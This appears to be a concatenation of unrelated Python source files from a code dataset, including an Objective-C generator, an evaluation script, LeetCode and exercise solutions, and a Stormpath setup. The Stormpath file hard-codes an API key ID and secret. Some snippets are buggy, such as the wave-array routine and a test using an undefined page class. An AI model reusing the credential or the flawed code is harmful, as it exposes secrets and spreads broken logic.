main()\n","sub_path":"assignments/09Telefono/src/exercise.py","file_name":"exercise.py","file_ext":"py","file_size_in_byte":400,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"109095026","text":"import webbrowser\r\n\r\n\r\nclass Movie():\r\n\r\n # centents are defined here\r\n def __init__(\r\n self,\r\n movie_title,\r\n movive_storyline,\r\n poster_image,\r\n trailer_youtube\r\n ):\r\n self.title = movie_title\r\n self.storyline = movive_storyline\r\n self.poster_image_url = poster_image\r\n self.trailer_youtube_url = trailer_youtube\r\n\r\n # open webbrowser when check the poster\r\n def show_trailer(self):\r\n webbrowser.open(self.trailer_youtube_url)\r\n","sub_path":"media.py","file_name":"media.py","file_ext":"py","file_size_in_byte":515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"12549095","text":"# encoding: utf-8\nfrom pdefc.lang import TypeEnum\nfrom pdefc.generators import Generator, Templates, GeneratorCli, PrefixMapper\n\n\nENCODING = 'utf8'\nHEADER_TEMPLATE = 'header.jinja2'\nIMPL_TEMPLATE = 'impl.jinja2'\nPACKAGE_TEMPLATE = 'package.jinja2'\n\n\nclass ObjectiveCGeneratorCli(GeneratorCli):\n def build_parser(self, parser):\n self._add_prefix_args(parser)\n\n def create_generator(self, out, args):\n prefixes = self._parse_prefix_args(args)\n return ObjectiveCGenerator(out, prefixes)\n\n\nclass ObjectiveCGenerator(Generator):\n '''Objective-C code generator.'''\n\n @classmethod\n def create_cli(cls):\n return ObjectiveCGeneratorCli()\n\n def __init__(self, out, prefixes=None):\n '''Create a new generator.'''\n super(ObjectiveCGenerator, self).__init__(out)\n\n self.prefix_mapper = PrefixMapper(prefixes)\n self.filters = _ObjectiveCFilters(self.prefix_mapper)\n self.templates = Templates(__file__, filters=self.filters)\n\n def generate(self, package):\n '''Generate a package source code.'''\n for module in package.modules:\n for definition in module.definitions:\n self._generate_header(definition)\n self._generate_impl(definition)\n\n self._generate_package(package)\n\n def _generate_header(self, definition):\n '''Generate a definition header file.'''\n code = 
self.templates.render(HEADER_TEMPLATE, definition=definition)\n filename = '%s.h' % self.filters.objc_name(definition)\n self.write_file(filename, code)\n return code\n\n def _generate_impl(self, definition):\n '''Generate a definition implementation file.'''\n code = self.templates.render(IMPL_TEMPLATE, definition=definition)\n filename = '%s.m' % self.filters.objc_name(definition)\n self.write_file(filename, code)\n return code\n\n def _generate_package(self, package):\n '''Generate a package file which groups all headers.'''\n code = self.templates.render(PACKAGE_TEMPLATE, package=package)\n\n names = set()\n for module in package.modules:\n for definition in module.definitions:\n names.add(self.filters.objc_name(definition).lower())\n\n # Generate a unique package file name.\n name = package.name\n while name in names:\n name += '_package'\n\n # Convert it into a CamelCase string.\n name = name.title().replace('_', '')\n\n # Write the package header file.\n filename = '%s.h' % name\n self.write_file(filename, code)\n return code\n\n\nclass _ObjectiveCFilters(object):\n '''Objective-C jinja filters.'''\n def __init__(self, prefix_mapper):\n self.prefix_mapper = prefix_mapper\n\n def objc_name(self, def0):\n name = def0.name\n prefix = self.prefix_mapper.get_prefix(def0.namespace) or ''\n return prefix + name\n\n def objc_bool(self, expression):\n return 'YES' if expression else 'NO'\n\n def objc_base(self, message):\n return self.objc_name(message.base) if message.base else 'PDMessage'\n\n def objc_isprimitive(self, type0):\n pointers = TypeEnum.COLLECTION_TYPES \\\n + (TypeEnum.MESSAGE, TypeEnum.INTERFACE, TypeEnum.STRING, TypeEnum.DATETIME)\n return type0.type not in pointers\n\n def objc_type(self, type0):\n t = type0.type\n if t in NATIVE_TYPES:\n return NATIVE_TYPES[t]\n elif t == TypeEnum.ENUM_VALUE:\n return '%s_%s ' % (self.objc_name(type0.enum), type0.name)\n elif t == TypeEnum.ENUM:\n return '%s ' % self.objc_name(type0)\n elif t == TypeEnum.INTERFACE:\n return 'id<%s> ' % self.objc_name(type0)\n elif t == TypeEnum.MESSAGE:\n return '%s *' % self.objc_name(type0)\n raise ValueError('Unsupported type %r' % type0)\n\n def objc_descriptor(self, type0):\n t = type0.type\n if t in NATIVE_DESCRIPTORS:\n return NATIVE_DESCRIPTORS[t]\n elif t == TypeEnum.ENUM:\n return '%sDescriptor()' % self.objc_name(type0)\n elif t == TypeEnum.LIST:\n return '[PDDescriptors listWithElement:%s]' % self.objc_descriptor(type0.element)\n elif t == TypeEnum.SET:\n return '[PDDescriptors setWithElement:%s]' % self.objc_descriptor(type0.element)\n elif t == TypeEnum.MAP:\n return '[PDDescriptors mapWithKey:%s value:%s]' % (\n self.objc_descriptor(type0.key),\n self.objc_descriptor(type0.value))\n elif t == TypeEnum.INTERFACE:\n return '%sDescriptor()' % self.objc_name(type0)\n elif t == TypeEnum.MESSAGE:\n return '[%s typeDescriptor]' % self.objc_name(type0)\n raise ValueError('Unsupported type %r' % type0)\n\n def objc_default(self, type0):\n t = type0.type\n value = NATIVE_DEFAULTS.get(t)\n if value:\n return value\n\n if t == TypeEnum.ENUM:\n return '0'\n\n return 'nil'\n\n def objc_result(self, type0):\n if type0.is_interface:\n return 'id<%s> ' % self.objc_name(type0)\n return 'NSOperation *'\n\n\nNATIVE_TYPES = {\n TypeEnum.BOOL: 'BOOL ',\n TypeEnum.INT16: 'int16_t ',\n TypeEnum.INT32: 'int32_t ',\n TypeEnum.INT64: 'int64_t ',\n TypeEnum.FLOAT: 'float ',\n TypeEnum.DOUBLE: 'double ',\n\n TypeEnum.STRING: 'NSString *',\n TypeEnum.DATETIME: 'NSDate *',\n\n TypeEnum.VOID: 'id',\n\n TypeEnum.LIST: 
'NSArray *',\n TypeEnum.SET: 'NSSet *',\n TypeEnum.MAP: 'NSDictionary *'\n}\n\nNATIVE_DESCRIPTORS = {\n TypeEnum.BOOL: '[PDDescriptors bool0]',\n TypeEnum.INT16: '[PDDescriptors int16]',\n TypeEnum.INT32: '[PDDescriptors int32]',\n TypeEnum.INT64: '[PDDescriptors int64]',\n TypeEnum.FLOAT: '[PDDescriptors float0]',\n TypeEnum.DOUBLE: '[PDDescriptors double0]',\n\n TypeEnum.STRING: '[PDDescriptors string]',\n TypeEnum.DATETIME: '[PDDescriptors datetime]',\n\n TypeEnum.VOID: '[PDDescriptors void0]',\n}\n\nNATIVE_DEFAULTS = {\n TypeEnum.BOOL: 'NO',\n TypeEnum.INT16: '0',\n TypeEnum.INT32: '0',\n TypeEnum.INT64: '0L',\n TypeEnum.FLOAT: '0.0f',\n TypeEnum.DOUBLE: '0.0'\n}\n","sub_path":"generator/pdef_objc/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":6215,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"388614422","text":"import json\nimport os\nimport pickle\nimport random\nfrom collections import defaultdict\n\nimport h5py\nimport sys\nimport numpy as np\nfrom os.path import join\n\nimport re\n\nfrom pandas import DataFrame\nfrom progressbar import ProgressBar\n\nfrom utils import array2txt, DBI\n\n# os.chdir('data_0626')\n\nfilename = 'features_x_new.hdf5'\n\nfeatures = json.load(open(join('../setup', 'feature_list.json')))\nfeature_names = sorted([f['id'] for f in features])\n\nrandom_array = np.array([6.00000000e-05, 2.20000000e-04, 6.80000000e-04, 1.90750000e-03,\n 4.72750000e-03, 1.13875000e-02, 2.59575000e-02, 5.65350000e-02,\n 1.15300000e-01, 2.16387500e-01])\n\nprecision = [random_array]\nnames = ['random']\n\n# Random Result:\n# [ 6.00000000e-05 2.20000000e-04 6.80000000e-04 1.90750000e-03\n# 4.72750000e-03 1.13875000e-02 2.59575000e-02 5.65350000e-02\n# 1.15300000e-01 2.16387500e-01]\n\ndoc2cate = {str(doc['index']): doc['category']\n for doc in DBI().articles.find({'target': True},\n {'category': 1, 'index': 1})}\n\nprint(len(doc2cate))\ncates = set(doc2cate.values())\nprint(len(cates))\n\ncate_precision = defaultdict(list)\n\ntry:\n precision = pickle.load(open('evaluate_precision.p', 'rb'))\n\n cate_precision = pickle.load(open('evaluate_precision_cate.p', 'rb'))\nexcept:\n measure_results = h5py.File(filename, 'r')\n label = h5py.File('features_y.hdf5')\n for i, feature_name in enumerate(feature_names):\n print(i, feature_name)\n hit = np.zeros((10,))\n total = np.zeros((10,))\n cate_hit = {c: np.zeros((10,)) for c in cates}\n cate_total = {c: np.zeros((10,)) for c in cates}\n keys = list(measure_results.keys())\n pbar = ProgressBar(max_value=len(keys))\n for key in keys:\n measure = measure_results[key][:, i]\n top_ids = np.argsort(measure)[-2:]\n cate = doc2cate[key]\n for _id in top_ids:\n total += np.array([1] * 10)\n cate_total[cate] += np.array([1] * 10)\n hit += label[key][_id]\n cate_hit[cate] += label[key][_id]\n pbar.update(pbar.value + 1)\n pbar.finish()\n precision.append(hit / total)\n for c in cates:\n cate_precision[c].append(cate_hit[c] / cate_total[c])\n print(precision[-1])\n\n pickle.dump(precision, open('evaluate_precision.p', 'wb'))\n pickle.dump(cate_precision, open('evaluate_precision_cate.p', 'wb'))\n\nprecision = np.array(precision)\nfor c in cate_precision:\n cate_precision[c].insert(0, random_array)\n cate_precision[c] = np.array(cate_precision[c])\n\ntext = ['content', 'title', 'summary']\n\n\ndef get_indexes(feature_names):\n regex = '(.+)_(.+)_(.+)_(.+)'\n pattern = re.compile(regex)\n result_indexes = [[[] for _i in range(0, 3)] for _ in range(0, 3)]\n 
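    # Note: the nested comprehensions (rather than [[[]]*3]*3) matter here: they
    # create nine independent inner lists, so the appends below do not alias
    # across the three text fields / three n-gram buckets.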
result_headers = [[[] for _i in range(0, 3)] for _ in range(0, 3)]\n for i, name in enumerate(feature_names):\n find = pattern.findall(name)\n if len(find) > 0 and ((find[0][1] == '1' and find[0][0] == 'stem')\n or (find[0][1] != '1' and find[0][0] == 'stemo')):\n find = find[0]\n result_indexes[text.index(find[2])][int(find[1]) - 1].append(i + 1)\n result_headers[text.index(find[2])][int(find[1]) - 1].append(find[3])\n return result_indexes, result_headers\n\nfeatures_indexes, feature_headers = get_indexes(feature_names)\n\n\nfrom matplotlib.backends.backend_pdf import PdfPages\nfrom matplotlib import pyplot as plt\nimport seaborn as sns\nimport matplotlib.ticker as mticker\npp = PdfPages('precision_2_3.pdf')\nsns.set('paper', style=\"dark\", color_codes=True)\nf, subfigs = plt.subplots(3, 3)\nplt.subplots_adjust(hspace=0.1, wspace=0.1)\nmodel_names = ['bow', 'jaccard', 'lda', 'lsi', 'tfidf']\ntarget_index = [1, 0, 4, 3, 2]\nfor i in range(0, 3):\n for j in range(0, 3):\n ax = subfigs[j][i]\n print(text[i], j + 1)\n index = features_indexes[i][j]\n headers = feature_headers[i][j]\n precision_feature = precision[index][:, 2]\n if j != 0:\n precision_feature[2] = 0\n frame = DataFrame([[model_names[index], precision_feature[index] * 100] for index in target_index\n if precision_feature[index] > 0],\n columns=['model', 'precision'])\n sns.barplot(x='precision', y='model', data=frame, ax=ax)\n max_width = max(precision_feature) * 100\n for p in ax.patches:\n if p.get_width() == max_width:\n ax.annotate('{:.2f}'.format(p.get_width()), (p.get_width() + 1, p.get_y() + 0.5), weight='bold',\n color='r', size=8)\n else:\n ax.annotate('{:.2f}'.format(p.get_width()), (p.get_width() + 1, p.get_y() + 0.5), size=8)\n\n ax.set(xlim=(0, 50))\n ax.set_ylabel('')\n ax.set_xlabel('')\n if j == 0:\n ax.set_title(text[i])\n if i == 2:\n ax.text(52, 2 if j == 0 else 1.5, ['unigram', 'bigram', 'trigram'][j], va='center', rotation='vertical')\n if i == 1:\n ax.yaxis.set_major_locator(mticker.NullLocator())\n if i == 2:\n ax.yaxis.set_major_locator(mticker.NullLocator())\n if j < 2:\n ax.xaxis.set_major_locator(mticker.NullLocator())\n\nf.text(0.5, 0.02, 'precision (%)', ha='center')\nf.text(0.02, 0.5, 'STS model', va='center', rotation='vertical')\npp.savefig()\npp.close()\n# plt.show()\n\n'''\nf_tex = open('../report_tex.txt', 'w')\nf_simple = open('../report_simple.txt', 'w')\nfor i in range(0, 3):\n for j in range(0, 3):\n print(text[i], j + 1)\n index = features_indexes[i][j]\n headers = feature_headers[i][j]\n precision_feature = precision[index]\n\n sort = np.argsort(precision_feature[:, 2])[::-1]\n sort_headers = [headers[sort_i] for sort_i in sort]\n sort_precision = np.array([precision_feature[sort_i] for sort_i in sort])\n latex = array2txt(sort_precision, [['{}-hops'.format(i) for i in range(1, 11)], sort_headers],\n variant_axis=[0, 1], format='latex')\n f_tex.write(text[i] + '_' + str(j + 1) + '\\n')\n f_tex.write(latex + '\\n\\n\\n')\n simple = array2txt(sort_precision, [['{}-hops'.format(i) for i in range(1, 11)], sort_headers],\n variant_axis=[0, 1], format='simple')\n f_simple.write(text[i] + '_' + str(j + 1) + '\\n')\n f_simple.write(simple + '\\n\\n\\n')\n print(array2txt(sort_precision, [['{}-hops'.format(i) for i in range(1, 11)], sort_headers],\n variant_axis=[0, 1], format='grid'))\n\n best = []\n\n for c in cates:\n cate_precision_feature = cate_precision[c][index]\n cate_sort = np.argsort(cate_precision_feature[:, 2])[::-1]\n cate_sort_headers = [headers[sort_i] for sort_i in cate_sort]\n 
cate_sort_precision = np.array([cate_precision_feature[sort_i] for sort_i in cate_sort])\n        f_tex.write(c + '\\n')\n        f_tex.write(array2txt(cate_sort_precision, [['{}-hops'.format(i) for i in range(1, 11)],\n                                                    cate_sort_headers],\n                              variant_axis=[0, 1], format='latex') + '\\n\\n\\n')\n        f_simple.write(c + '\\n')\n        f_simple.write(array2txt(cate_sort_precision, [['{}-hops'.format(i) for i in range(1, 11)],\n                                                       cate_sort_headers],\n                                 variant_axis=[0, 1], format='simple') + '\\n\\n\\n')\n\n        best.append(cate_sort_precision[0].tolist() + [cate_sort_headers[0]])\n    best = np.array(best)\n    cate_list = list(cates)\n    best_sort = np.argsort(best[:, 2])[::-1]\n    best_sort_headers = [cate_list[sort_i] for sort_i in best_sort]\n    best_sort_precision = np.array([best[sort_i] for sort_i in best_sort])\n    print(array2txt(best_sort_precision, [['{}-hops'.format(i) for i in range(1, 11)] + ['feature name'],\n                                          best_sort_headers],\n                    variant_axis=[0, 1], format='grid'))\n\n'''\n","sub_path":"source/evaluate.py","file_name":"evaluate.py","file_ext":"py","file_size_in_byte":8252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
+{"seq_id":"335485270","text":"\"\"\"\n1162. As Far from Land as Possible\n\nGiven an n x n grid containing only values 0 and 1, where 0 represents water and 1 represents land, find a water cell\nsuch that its distance to the nearest land cell is maximized, and return the distance. If no land or water exists in the grid, return -1.\n\nThe distance used in this problem is the Manhattan distance: the distance between two cells (x0, y0) and (x1, y1) is |x0 - x1| + |y0 - y1|.\n\n\nExample 1:\n\n\nInput: grid = [[1,0,1],[0,0,0],[1,0,1]]\nOutput: 2\nExplanation: The cell (1, 1) is as far as possible from all the land with distance 2.\nExample 2:\n\n\nInput: grid = [[1,0,0],[0,0,0],[0,0,0]]\nOutput: 4\nExplanation: The cell (2, 2) is as far as possible from all the land with distance 4.\n\n\nConstraints:\n\nn == grid.length\nn == grid[i].length\n1 <= n <= 100\ngrid[i][j] is 0 or 1\n\n\n\n\"\"\"\n\n\nclass MaxDistance:\n\n    def doit_bfs(self, grid: list) -> int:\n        from collections import deque\n        q = deque([])\n        m, n = len(grid), len(grid[0])\n\n        for i in range(m):\n            for j in range(n):\n                if grid[i][j] == 1:\n                    q.append((i, j))\n\n        # no land or no water: there is no valid water cell, return -1 as specified\n        if len(q) == 0 or len(q) == m * n:\n            return -1\n\n        d = -1\n        while q:\n            size = len(q)\n            for c in range(size):\n                i, j = q.popleft()\n                for x, y in ((i - 1, j), (i, j + 1), (i + 1, j), (i, j - 1)):\n                    if 0 <= x < m and 0 <= y < n and grid[x][y] == 0:\n                        grid[x][y] = 1\n                        q.append((x, y))\n            d += 1\n\n        return d\n\n    def doit_bfs_1(self, grid: list) -> int:\n        q, vis = [], set()\n        for i in range(len(grid)):\n            for j in range(len(grid[0])):\n                if grid[i][j] == 1:\n                    q.append((i, j, 0))\n                    vis.add((i, j))\n\n        if len(q) == 0 or len(q) == len(grid) * len(grid[0]): return -1\n        ans = 0\n        while q:\n            i, j, d = q.pop(0)\n            for x, y in [(i - 1, j), (i + 1, j), (i, j - 1), (i, j + 1)]:\n                if 0 <= x < len(grid) and 0 <= y < len(grid[0]):\n                    if (x, y) not in vis:\n                        vis.add((x, y))\n                        ans = max(ans, d + 1)\n                        q.append((x, y, d + 1))\n\n        return ans","sub_path":"PythonLeetcode/leetcodeM/1162_AsFarFromLandAsPossible.py","file_name":"1162_AsFarFromLandAsPossible.py","file_ext":"py","file_size_in_byte":2314,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
+{"seq_id":"470430075","text":"from stormpath.client import Client as StormpathClient\n\nSTORMPATH_API_KEY_ID=\"4FESWTU76DNA7UVHUCNJ6E0AB\"\nSTORMPATH_API_KEY_SECRET=\"dx5/ABWKvnjxMM5nEMwNLyCc90y0wwUXfNsKWBJWaJ4\"\nSTORMPATH_APPLICATION_NAME=\"Daily Idea\"\n\nstormpath_client = StormpathClient(\n    api_key_id=STORMPATH_API_KEY_ID,\n    api_key_secret=STORMPATH_API_KEY_SECRET)\nstormpath_application = stormpath_client.applications.search(STORMPATH_APPLICATION_NAME)[0]\n\n","sub_path":"playtime.py","file_name":"playtime.py","file_ext":"py","file_size_in_byte":466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
+{"seq_id":"109354341","text":"import ROOT\nROOT.gSystem.Load(\"libHiggsAnalysisCombinedLimit\")\nimport json\n\n\nclass XZZDataCardMaker:\n    def __init__(self,finalstate,category,luminosity=1.0,physics=\"LJ\"):\n        self.physics=physics\n        self.finalstate=finalstate\n        self.category=category\n        self.contributions=[]\n        self.systematics=[]\n        self.observation=0.0\n\n        self.tag=self.physics+\"_\"+finalstate+\"_\"+category\n        self.luminosity=luminosity\n\n\n    def addSystematic(self,name,kind,values,addPar = \"\"):\n        self.systematics.append({'name':name,'kind':kind,'values':values })\n\n    def addObservation(self,observation=0):\n        self.observation=observation\n\n    def addContribution(self,name,ID,rate):\n        self.contributions.append({'name':name,'ID':ID,'rate':rate}) \n\n    def makeCard(self):\n\n        f = open(self.tag+'.txt','w')\n        f.write('imax 1\\n')\n        f.write('jmax {n}\\n'.format(n=len(self.contributions)-1))\n        f.write('kmax *\\n')\n        f.write('-------------------------\\n')\n        f.write('bin '+self.tag+'\\n')\n        f.write('observation '+str(self.observation)+'\\n')\n        f.write('-------------------------\\n')\n\n        # sorted contributions\n        contributions = sorted(self.contributions,key=lambda x: x['ID'])\n\n        # print bin\n        f.write('bin\\t')\n        for contrib in contributions:\n            f.write(self.tag+'\\t')\n        f.write('\\n')\n\n        # print names\n        f.write('process\\t')\n        for contrib in contributions:\n            f.write(contrib['name']+'\\t')\n        f.write('\\n')\n\n        # print IDs\n        f.write('process\\t')\n        for contrib in contributions:\n            f.write(str(contrib['ID'])+'\\t')\n        f.write('\\n')\n\n        # print rate\n        f.write('rate\\t')\n        for contrib in contributions:\n            f.write(str(contrib['rate'])+'\\t')\n        f.write('\\n')\n\n        f.write('-------------------------\\n')\n\n        # print systematics\n        for syst in self.systematics:\n            if syst['kind'] == 'param':\n                f.write(syst['name']+'\\t'+'param\\t' +str(syst['values'][0])+'\\t'+str(syst['values'][1])+'\\n')\n            elif syst['kind'] == 'lnN':\n                f.write(syst['name']+'\\t'+ 'lnN\\t' )\n                for contrib in 
contributions:\n has=False\n for name,v in syst['values'].iteritems():\n if contrib['name']==name:\n f.write(str(v)+'\\t' )\n has=True\n break;\n if not has:\n f.write('-\\t' )\n f.write('\\n' )\n \n \n f.close()\n\n\n \n\n","sub_path":"XZZ2l2nu/python/statistics/XZZDataCardMaker.py","file_name":"XZZDataCardMaker.py","file_ext":"py","file_size_in_byte":2736,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"62887066","text":"#!/usr/bin/env python\nimport subprocess\n\nimport rospy\nfrom std_msgs.msg import String\n\n\ndef cb(msg: String):\n args = [\"espeak\", msg.data]\n subprocess.run(args)\n\n\ndef main():\n rospy.init_node(\"tts_node\")\n sub = rospy.Subscriber(\"speak\", String, cb)\n rospy.spin()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"scripts/tts_node.py","file_name":"tts_node.py","file_ext":"py","file_size_in_byte":317,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"112304685","text":"'''\nProblem Statement\nGiven a sorted array arr[] of distinct integers. Sort the array into a wave-like array and return it.\nIn other words, arrange the elements into a sequence such that a1 >= a2 <= a3 >= a4 <= a5.....\n(considering the increasing lexicographical order).\n\nInput Format\n\nFirst line of input contains n-the size of array. Next line of input contains n integers-the\nelements of array.\n\nConstraints\n\n1 ≤ n ≤ 10^6\n0 ≤ Ai ≤10^7\n\nOutput Format\n\nPrint the array which should be sorted in wave like pattern.\n'''\n\nn=int(input())\narr = list(set(map(int,input().split())))\nfor i in range(0,n-1,2):\n arr[i], arr[i+1] = arr[i+1], arr[i]\nprint(*arr)\n","sub_path":"WaveFormArray.py","file_name":"WaveFormArray.py","file_ext":"py","file_size_in_byte":662,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"426874937","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Sep 8 10:37:34 2019\r\n\r\n@author: Vik Jakkula\r\n\"\"\"\r\n\r\nimport torch \r\nfrom torch.autograd import Variable\r\nimport torch.nn as nn\r\nimport torch.optim as optim\r\n\r\nx = Variable(torch.Tensor([[1],[2],[3],[4]]))\r\ny = Variable(torch.Tensor([[2],[4],[6],[8]]))\r\n\r\nprint(x)\r\n\r\nclass LinearRegressionModel(nn.Module):\r\n def __init__(self,input_size,output_size):\r\n super(LinearRegressionModel,self).__init__()\r\n self.linear = nn.Linear(input_size,output_size)\r\n \r\n def forward(self,x):\r\n y_predict = self.linear(x)\r\n return y_predict\r\n \r\nmodel = LinearRegressionModel(1,1)\r\ncriteria = nn.MSELoss()\r\n# 0.01 is learning rate\r\noptimizer = optim.SGD(model.parameters(),0.01)\r\n\r\nfor epoch in range(500):\r\n y_predict = model(x)\r\n loss = criteria(y_predict,y)\r\n optimizer.zero_grad()\r\n loss.backward()\r\n optimizer.step()\r\n print(epoch, float(loss.data[0]))\r\n\r\n\r\ntest = Variable(torch.Tensor([20]))\r\nz = model.forward(test)\r\nprint(float(z[0]))\r\n\r\n\r\n","sub_path":"regression.py","file_name":"regression.py","file_ext":"py","file_size_in_byte":1037,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"66903006","text":"#!/usr/bin/env python3\nimport os\nimport sys\n\nsys.path.append(os.path.dirname(__file__)+\"/../../../\")\n\ndef main():\n os.environ['MODE']='develop'\n from nwpc_monitor_task_scheduler.celery_server.task import sms\n\n result = sms.get_group_sms_status_task.delay()\n # result = tasks.update_dingtalk_token_task.delay()\n\n 
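    # Editorial note: delay() returns a Celery AsyncResult immediately, so the
    # print below shows the task handle rather than the task's return value; to
    # block for the actual value one could call, e.g., result.get(timeout=30).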
print(result)\n\nif __name__ == \"__main__\":\n    main()\n","sub_path":"test/manual/nwpc_monitor_task_scheduler/run_tasks.py","file_name":"run_tasks.py","file_ext":"py","file_size_in_byte":380,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
+{"seq_id":"621750777","text":"import os\n\nOUTFILENAME = \"output.txt\"\n\nfiles = [f for f in os.listdir(\".\") if os.path.isfile(f) and f != os.path.basename(__file__) and f != OUTFILENAME]\n\nstrings = []\n\nfor f in files:\n\twith open(f) as infile:\n\t\tstrings.append(infile.read())\n\nwith open(OUTFILENAME, \"w\") as outfile:\n\toutfile.write(\"\\n\\n\".join(strings))\n","sub_path":"concat.py","file_name":"concat.py","file_ext":"py","file_size_in_byte":321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
+{"seq_id":"104468538","text":"import sys\n#print(sys.path)\nimport os\n# change into the project directory\nos.chdir('D:\\\\Test_framework-master')\n# print the entries under the project directory\n#for file in os.listdir(os.getcwd()):\n#    print(file)\nsys.path.append('D:\\\\Test_framework-master')\n\nimport time\nimport unittest\nfrom srcut.config import Config, DATA_PATH, REPORT_PATH\nfrom srcut.log import logger\nfrom srcut.file_reader import ExcelReader\nfrom srcut.HTMLTestRunner import HTMLTestRunner\n#from srcut.test_youj import Email\nfrom test.page.xm_home_page import XmHomePage\n\nclass TestXm(unittest.TestCase):\n    URL = Config().get('URL')\n    excel = DATA_PATH + '/test.xlsx'\n\n    def sub_setUp(self):\n        # the initial page is the main page; pass in the browser type to open the browser\n        self.page = XmHomePage(browser_type='chrome').get(self.URL, maximize_window=False)\n\n    def sub_tearDown(self):\n        self.page.quit()\n\n    def test_login(self):\n        datas = ExcelReader(self.excel).data\n        for d in datas:\n            with self.subTest(data=d):\n                self.sub_setUp()\n                self.page.search(d['xxxx'])\n                time.sleep(2)\n                self.page = XmLoginPage(self.page)  # the page switches to the result page (XmLoginPage must come from the project's page objects)\n                links = self.page.result_links\n                for link in links:\n                    logger.info(link.text)\n                self.sub_tearDown()\n\n\nif __name__ == '__main__':\n    report = REPORT_PATH + '\\\\report.html'\n    with open(report, 'wb') as f:\n        runner = HTMLTestRunner(f, verbosity=2, title='Test site mcf', description='modified html report')\n        runner.run(TestXm('test_login'))\n    # e = Email(title='Test site test report',\n    #           message='Here is the test report for today, please check it.',\n    #           receiver='422703409@qq.com',\n    #           server='...',\n    #           sender='...',\n    #           password='...',\n    #           path=report\n    #           )\n    # e.send()\n","sub_path":"test/case/test_baidu_6.py","file_name":"test_baidu_6.py","file_ext":"py","file_size_in_byte":1927,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
+{"seq_id":"479387535","text":"import pickle\nfrom openke.utils import DeepDict\nfrom subgraphs import read_triples\n\nclass DynamicTopk:\n    def __init__(self, default=10):\n        self.topk_dict_head = DeepDict()\n        self.topk_dict_tail = DeepDict()\n        self.default_topk = default\n\n    def get_dyn_topk(self, ent, rel, type_prediction):\n        if type_prediction == \"head\":\n            if (ent, rel) in self.topk_dict_head:\n                return self.topk_dict_head[(ent, rel)]\n            else:\n                return self.default_topk\n        elif type_prediction == \"tail\":\n            if (ent, rel) in self.topk_dict_tail:\n                return self.topk_dict_tail[(ent, rel)]\n            else:\n                return self.default_topk\n\n    def populate(self, triples_file):\n        triples = read_triples(triples_file)\n        for triple in triples:\n            if (triple[0], triple[2]) in self.topk_dict_tail:\n                self.topk_dict_tail[(triple[0],triple[2])] += 1\n            else:\n                self.topk_dict_tail[(triple[0],triple[2])] = 1\n\n            if (triple[1], triple[2]) in 
self.topk_dict_head:\n self.topk_dict_head[(triple[1], triple[2])] += 1\n else:\n self.topk_dict_head[(triple[1], triple[2])] = 1\n\n def load(self, dyn_topk_head_filename, dyn_topk_tail_filename):\n with open(dyn_topk_tail_filename, 'rb') as fin:\n self.topk_dict_tail = pickle.load(fin)\n\n with open(dyn_topk_head_filename, 'rb') as fin:\n self.topk_dict_head = pickle.load(fin)\n\n def save(self, dyn_topk_head_filename, dyn_topk_tail_filename):\n with open(dyn_topk_tail_filename, 'wb') as fout:\n pickle.dump(self.topk_dict_tail, fout, protocol = pickle.HIGHEST_PROTOCOL)\n\n with open(dyn_topk_head_filename, 'wb') as fout:\n pickle.dump(self.topk_dict_head, fout, protocol = pickle.HIGHEST_PROTOCOL)\n","sub_path":"dynamic_topk.py","file_name":"dynamic_topk.py","file_ext":"py","file_size_in_byte":1893,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"645019783","text":"# coding: utf-8\n\nfrom __future__ import absolute_import\n\nfrom swagger_server import util\nfrom swagger_server.models.base_model_ import Model\n\n\nclass SecurityMixin(Model):\n \"\"\"NOTE: This class is auto generated by the swagger code generator program.\n\n Do not edit the class manually.\n \"\"\"\n \n def __init__(self, identifier: str = None, securitykey: str = None, ip: str = None): # noqa: E501\n \"\"\"SecurityMixin - a model defined in Swagger\n\n :param identifier: The identifier of this SecurityMixin. # noqa: E501\n :type identifier: str\n :param securitykey: The securitykey of this SecurityMixin. # noqa: E501\n :type securitykey: str\n :param ip: The ip of this SecurityMixin. # noqa: E501\n :type ip: str\n \"\"\"\n self.swagger_types = {\n 'identifier': str,\n 'securitykey': str,\n 'ip': str\n }\n \n self.attribute_map = {\n 'identifier': 'identifier',\n 'securitykey': 'securitykey',\n 'ip': 'ip'\n }\n self._identifier = identifier\n self._securitykey = securitykey\n self._ip = ip\n \n @classmethod\n def from_dict(cls, dikt) -> 'SecurityMixin':\n \"\"\"Returns the dict as a model\n\n :param dikt: A dict.\n :type: dict\n :return: The SecurityMixin of this SecurityMixin. 
